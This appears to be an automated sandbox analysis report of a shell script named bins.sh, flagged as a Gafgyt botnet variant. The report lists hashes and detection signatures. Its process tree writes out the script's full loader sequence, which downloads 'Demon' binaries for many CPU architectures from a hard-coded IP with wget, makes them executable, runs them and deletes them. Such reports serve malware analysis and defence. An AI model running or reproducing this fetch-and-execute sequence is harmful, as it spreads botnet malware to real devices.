Analysis
-
max time kernel
8s -
max time network
10s -
platform
ubuntu-22.04_amd64 -
resource
ubuntu2204-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu2204-amd64-20240611-enkernel:5.15.0-105-genericlocale:en-usos:ubuntu-22.04-amd64system -
submitted
19-10-2024 11:41
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
debian12-armhf-20240418-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian12-mipsel-20240729-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral5
Sample
bins.sh
Resource
debian9-mipsel-20240611-en
Behavioral task
behavioral6
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral7
Sample
bins.sh
Resource
ubuntu2004-amd64-20240611-en
Behavioral task
behavioral8
Sample
bins.sh
Resource
ubuntu2204-amd64-20240611-en
Behavioral task
behavioral9
Sample
bins.sh
Resource
ubuntu2404-amd64-20240523-en
General
-
Target
bins.sh
-
Size
2KB
-
MD5
a754f4cf9d6ba2d574cd90bf04d1bc35
-
SHA1
b0191e89c26057b6132f3314fa685e1879c7dc62
-
SHA256
bf9fa0c44e56d564d8675f89533c1930b9481597d1f0d09153757d595b8ddaa0
-
SHA512
600b970d65a1b8d80e0c7e9808cff50fbb610762a97d619293b859383c85ff671a28793f49d8207c984ffe113c63dabfa66d3df4d922b32c79ce707b3393162f
Malware Config
Signatures
-
Detected Gafgyt variant 1 IoCs
Processes:
resource yara_rule /tmp/Demon.mips family_gafgyt -
File and Directory Permissions Modification 1 TTPs 14 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodpid process 1645 chmod 1608 chmod 1635 chmod 1650 chmod 1619 chmod 1587 chmod 1597 chmod 1614 chmod 1625 chmod 1630 chmod 1640 chmod 1582 chmod 1592 chmod 1603 chmod -
Executes dropped EXE 1 IoCs
Processes:
Demon.mipsioc pid process /tmp/Demon.mips 1583 Demon.mips -
Reads system routing table 1 TTPs 3 IoCs
Gets active network interfaces from /proc virtual filesystem.
Processes:
Demon.x86Demon.i686Demon.i586description ioc process File opened for reading /proc/net/route Demon.x86 File opened for reading /proc/net/route Demon.i686 File opened for reading /proc/net/route Demon.i586 -
Changes its process name 3 IoCs
Processes:
Demon.x86Demon.i686Demon.i586description pid process Changes the process name, possibly in an attempt to hide itself 1598 Demon.x86 Changes the process name, possibly in an attempt to hide itself 1609 Demon.i686 Changes the process name, possibly in an attempt to hide itself 1620 Demon.i586 -
Reads system network configuration 1 TTPs 3 IoCs
Uses contents of /proc filesystem to enumerate network settings.
Processes:
Demon.i586Demon.x86Demon.i686description ioc process File opened for reading /proc/net/route Demon.i586 File opened for reading /proc/net/route Demon.x86 File opened for reading /proc/net/route Demon.i686 -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
Processes:
wgetDemon.mipsrmpid process 1571 wget 1583 Demon.mips 1585 rm -
Writes file to tmp directory 13 IoCs
Malware often drops required files in the /tmp directory.
Processes:
wgetwgetwgetwgetwgetwgetwgetwgetwgetwgetwgetwgetwgetdescription ioc process File opened for modification /tmp/Demon.arm5 wget File opened for modification /tmp/Demon.mips wget File opened for modification /tmp/Demon.mpsl wget File opened for modification /tmp/Demon.sh4 wget File opened for modification /tmp/Demon.arm6 wget File opened for modification /tmp/Demon.i686 wget File opened for modification /tmp/Demon.m68k wget File opened for modification /tmp/Demon.arm4 wget File opened for modification /tmp/Demon.x86 wget File opened for modification /tmp/Demon.ppc wget File opened for modification /tmp/Demon.i586 wget File opened for modification /tmp/Demon.sparc wget File opened for modification /tmp/Demon.arm7 wget
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:1570
-
/usr/bin/wgetwget http://38.123.149.216/Demon.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1571 -
/usr/bin/chmodchmod +x Demon.mips2⤵
- File and Directory Permissions Modification
PID:1582 -
/tmp/Demon.mips./Demon.mips2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:1583 -
/usr/bin/rmrm -rf Demon.mips2⤵
- System Network Configuration Discovery
PID:1585 -
/usr/bin/wgetwget http://38.123.149.216/Demon.mpsl2⤵
- Writes file to tmp directory
PID:1586 -
/usr/bin/chmodchmod +x Demon.mpsl2⤵
- File and Directory Permissions Modification
PID:1587 -
/tmp/Demon.mpsl./Demon.mpsl2⤵PID:1588
-
/usr/bin/rmrm -rf Demon.mpsl2⤵PID:1590
-
/usr/bin/wgetwget http://38.123.149.216/Demon.sh42⤵
- Writes file to tmp directory
PID:1591 -
/usr/bin/chmodchmod +x Demon.sh42⤵
- File and Directory Permissions Modification
PID:1592 -
/tmp/Demon.sh4./Demon.sh42⤵PID:1593
-
/usr/bin/rmrm -rf Demon.sh42⤵PID:1595
-
/usr/bin/wgetwget http://38.123.149.216/Demon.x862⤵
- Writes file to tmp directory
PID:1596 -
/usr/bin/chmodchmod +x Demon.x862⤵
- File and Directory Permissions Modification
PID:1597 -
/tmp/Demon.x86./Demon.x862⤵
- Reads system routing table
- Changes its process name
- Reads system network configuration
PID:1598 -
/usr/bin/rmrm -rf Demon.x862⤵PID:1601
-
/usr/bin/wgetwget http://38.123.149.216/Demon.arm62⤵
- Writes file to tmp directory
PID:1602 -
/usr/bin/chmodchmod +x Demon.arm62⤵
- File and Directory Permissions Modification
PID:1603 -
/tmp/Demon.arm6./Demon.arm62⤵PID:1604
-
/usr/bin/rmrm -rf Demon.arm62⤵PID:1606
-
/usr/bin/wgetwget http://38.123.149.216/Demon.i6862⤵
- Writes file to tmp directory
PID:1607 -
/usr/bin/chmodchmod +x Demon.i6862⤵
- File and Directory Permissions Modification
PID:1608 -
/tmp/Demon.i686./Demon.i6862⤵
- Reads system routing table
- Changes its process name
- Reads system network configuration
PID:1609 -
/usr/bin/rmrm -rf Demon.i6862⤵PID:1612
-
/usr/bin/wgetwget http://38.123.149.216/Demon.ppc2⤵
- Writes file to tmp directory
PID:1613 -
/usr/bin/chmodchmod +x Demon.ppc2⤵
- File and Directory Permissions Modification
PID:1614 -
/tmp/Demon.ppc./Demon.ppc2⤵PID:1615
-
/usr/bin/rmrm -rf Demon.ppc2⤵PID:1617
-
/usr/bin/wgetwget http://38.123.149.216/Demon.i5862⤵
- Writes file to tmp directory
PID:1618 -
/usr/bin/chmodchmod +x Demon.i5862⤵
- File and Directory Permissions Modification
PID:1619 -
/tmp/Demon.i586./Demon.i5862⤵
- Reads system routing table
- Changes its process name
- Reads system network configuration
PID:1620 -
/usr/bin/rmrm -rf Demon.i5862⤵PID:1623
-
/usr/bin/wgetwget http://38.123.149.216/Demon.m68k2⤵
- Writes file to tmp directory
PID:1624 -
/usr/bin/chmodchmod +x Demon.m68k2⤵
- File and Directory Permissions Modification
PID:1625 -
/tmp/Demon.m68k./Demon.m68k2⤵PID:1626
-
/usr/bin/rmrm -rf Demon.m68k2⤵PID:1628
-
/usr/bin/wgetwget http://38.123.149.216/Demon.sparc2⤵
- Writes file to tmp directory
PID:1629 -
/usr/bin/chmodchmod +x Demon.sparc2⤵
- File and Directory Permissions Modification
PID:1630 -
/tmp/Demon.sparc./Demon.sparc2⤵PID:1631
-
/usr/bin/rmrm -rf Demon.sparc2⤵PID:1633
-
/usr/bin/wgetwget http://38.123.149.216/Demon.arm42⤵
- Writes file to tmp directory
PID:1634 -
/usr/bin/chmodchmod +x Demon.arm42⤵
- File and Directory Permissions Modification
PID:1635 -
/tmp/Demon.arm4./Demon.arm42⤵PID:1636
-
/usr/bin/rmrm -rf Demon.arm42⤵PID:1638
-
/usr/bin/wgetwget http://38.123.149.216/Demon.arm52⤵
- Writes file to tmp directory
PID:1639 -
/usr/bin/chmodchmod +x Demon.arm52⤵
- File and Directory Permissions Modification
PID:1640 -
/tmp/Demon.arm5./Demon.arm52⤵PID:1641
-
/usr/bin/rmrm -rf Demon.arm52⤵PID:1643
-
/usr/bin/wgetwget http://38.123.149.216/Demon.arm72⤵
- Writes file to tmp directory
PID:1644 -
/usr/bin/chmodchmod +x Demon.arm72⤵
- File and Directory Permissions Modification
PID:1645 -
/tmp/Demon.arm7./Demon.arm72⤵PID:1646
-
/usr/bin/rmrm -rf Demon.arm72⤵PID:1648
-
/usr/bin/wgetwget http://38.123.149.216/Demon.ppc440fp2⤵PID:1649
-
/usr/bin/chmodchmod +x Demon.ppc440fp2⤵
- File and Directory Permissions Modification
PID:1650 -
/tmp/Demon.ppc440fp./Demon.ppc440fp2⤵PID:1651
-
/usr/bin/rmrm -rf Demon.ppc440fp2⤵PID:1652
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
211KB
MD5455a2acf75de8da6ab7c4d9564cc69f9
SHA19e6016c6581289e685bcd6392bbf0bcf6b1182ff
SHA256b08dea7aae12f248b7730af3c8f924dd67d3251d78df15a9dfb75e5d961df152
SHA512a76b00d7f684d762ea9d5fa60d579d70b8bdfe75faedb59baae6ffb676d25d57826cde4a639c0b32dfcc3288a965591e148a489e6259910e3e0dbee90ccadeab